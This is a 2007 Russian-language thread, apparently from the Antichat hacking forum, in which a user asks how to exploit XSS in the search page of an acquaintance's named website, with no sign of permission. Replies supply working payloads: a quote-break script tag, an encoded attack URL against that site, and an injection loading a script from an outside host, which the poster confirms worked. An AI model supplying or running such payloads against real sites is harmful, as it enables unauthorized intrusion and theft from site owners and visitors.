Форум АНТИЧАТ - Помогите с Xss

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Помогите с Xss (https://forum.antichat.xyz/showthread.php?t=54748)

Zhenek

30.11.2007 18:56

Помогите с Xss

Вот хочу сайт знакомого разлатать на XSS
Там пробовал поиск дрюкать.

http://byte.z52.ru/Search.php

В поиск подставлял

Код:

\"\"<script>alert("")</script>

Смотрел вроде он слова <script> пропустил а вот alert подпортил.

Может кто поможет??? несколько часов убил на него.

Очень надеюсь на помощь. Тут уже интерес появился,нужна помощь(

TrypoED

30.11.2007 19:13

Я не понял вопроса ( Ты хочешь чтобы алерт вылетел ?

bul.666

30.11.2007 19:17

http://byte.z52.ru/Search.php?dosearch=yes&story=%22%3E%3Cscript+src% 3Dhttp%3A%2F%2Flamer-power.jino-net.ru%2Fs%3E+%3C%2Fscript%3E

Exlibris

30.11.2007 19:21

Zhenek пиши например так

Цитата:

"><script>alert(/123/)</script>

ZAMUT

30.11.2007 19:23

Код:

http://byte.z52.ru/Search.php?dosearch=yes&story=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&title=&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day=&to_date_month=&to_date_year=

Solide Snake

30.11.2007 20:15

Блин, ну для кого эта тема?
Зачем новую создавать?

Zhenek

01.12.2007 03:20

Все вышеперечисленное неработает(((
Я уже пробовал закрывать тех,но появляется заного страница и там нет моего кода.. Думаю его вырезели...

BlackCats

01.12.2007 03:30

http://old.antichat.ru/crackchat/HTML/
+
то что написал булка - работает.

Zhenek

01.12.2007 06:03

Спасибо.. Все заработало.. просто у меня картинки были отключены а без них надпись не появляется)))

Время: 20:02